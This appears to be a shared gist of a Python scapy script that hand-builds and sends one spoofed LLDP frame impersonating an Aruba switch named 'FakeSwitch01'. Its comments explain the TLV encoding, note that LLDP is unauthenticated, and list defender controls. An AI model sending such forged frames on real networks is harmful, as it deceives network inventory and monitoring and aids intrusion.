Created
August 5, 2021 00:46
SCAPY - LLDP Impersonation
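# Builds one hand-encoded LLDP frame (EtherType 0x88cc) that advertises the
# identity of an Aruba 2930F switch named "FakeSwitch01", prints it, and sends
# it once on a fixed interface.
#
# LLDP carries no authentication, so a receiver has no way to verify any field
# below and records them as the neighbour's identity. For defenders, the
# relevant controls are disabling LLDP receive on edge/access ports and
# alerting on new or changed LLDP neighbours there.
#
# Every TLV starts with a 2-byte header: 7-bit type, then 9-bit length of the
# value that follows. The headers below are written out by hand, so the length
# byte must be updated whenever a value is edited.

# Explicit names instead of `from scapy.all import *`, so it is clear which
# scapy symbols the script relies on.
from scapy.all import Ether, Padding, Raw, sendp

# Interface to send on. To find the right name, run `getmac /v` on Windows
# (escape the backslashes) or `ip a s eth0` on Linux.
IFACE = "\\Device\\NPF_{63914CF1-16AF-4570-A674-AEB313EBCD3B}"

# Chassis ID (type 1, length 7): subtype 4 = MAC address, then the 6-byte MAC.
chassis = bytearray((0x02, 0x07, 0x04,
                     0x94, 0xf1, 0x28, 0x8b, 0xaa, 0x1f))

# Port ID (type 2, length 2): subtype 7 = locally assigned, value ASCII "2".
portID = bytearray((0x04, 0x02, 0x07, 0x32))

# TTL (type 3, length 2): 0x0078 = 120 seconds.
TTL = bytearray((0x06, 0x02, 0x00, 0x78))

# System name (type 5, length 0x0c = 12, the length of the string).
sysname = bytearray((0x0a, 0x0c)) + 'FakeSwitch01'.encode('utf-8')

# System description (type 6, length 0xa7 = 167, the length of the string).
sysdesc = bytearray((0x0c, 0xa7)) + (
    'Aruba JL258A 2930F-8G-PoE+-2SFP+ Switch, revision WC.16.10.0015, '
    'ROM WC.16.01.0008 (/ws/swbuildm/rel_ajanta_qaoff/code/build/'
    'lvm(swbuildm_rel_ajanta_qaoff_rel_ajanta))'
).encode('utf-8')

# System capabilities (type 7, length 4): supported 0x0014, enabled 0x0014.
cap = bytearray((0x0e, 0x04, 0x00, 0x14, 0x00, 0x14))

# Management address (type 8, length 12): address length 5, subtype 1 (IPv4),
# 10.1.1.8, interface subtype 2, interface number 0, OID length 0.
mgmtaddr = bytearray((0x10, 0x0c,
                      0x05, 0x01, 0x0a, 0x01, 0x01, 0x08,
                      0x02, 0x00, 0x00, 0x00, 0x00, 0x00))

# Vendor-specific TLV (type 127, length 6): OUI 00:16:b9, then 02 00 00.
vendor = bytearray((0xfe, 0x06, 0x00, 0x16, 0xb9, 0x02, 0x00, 0x00))

# Port description (type 4, length 1): ASCII "2".
portdescr = bytearray((0x08, 0x01, 0x32))

# LLDP-MED capabilities (type 127, length 7): OUI 00:12:bb, subtype 1,
# capabilities 0x000f, device type 4.
med = bytearray((0xfe, 0x07, 0x00, 0x12, 0xbb, 0x01, 0x00, 0x0f, 0x04))

# Port VLAN ID (type 127, length 6): OUI 00:80:c2, subtype 1, PVID 1.
portvlan = bytearray((0xfe, 0x06, 0x00, 0x80, 0xc2, 0x01, 0x00, 0x01))

# End of LLDPDU (type 0, length 0).
end = bytearray((0x00, 0x00))

# Chassis ID, Port ID and TTL come first, in that order; End of LLDPDU is last.
payload = bytes(
    chassis + portID + TTL
    + sysname + sysdesc + cap + mgmtaddr
    + vendor + portdescr + med + portvlan
    + end
)

# LLDP nearest-bridge multicast address.
mac_lldp_multicast = '01:80:c2:00:00:0e'

# The Ethernet source is the same MAC that the Chassis ID TLV advertises.
eth = Ether(src='94:f1:28:8b:aa:1f', dst=mac_lldp_multicast, type=0x88cc)

# The LLDPDU is about 250 bytes, so the frame is already well above the
# 60-byte Ethernet minimum; the 4 zero bytes of Padding are kept only so the
# bytes on the wire stay the same as before.
frame = eth / Raw(load=payload) / Padding(b'\x00\x00\x00\x00')

# Print the decoded frame to the console.
frame.show()

# Send the frame once. The earlier call also passed loop=10, but scapy gives
# `count` precedence over `loop`, so that argument had no effect.
sendp(frame, count=1, verbose=1, iface=IFACE)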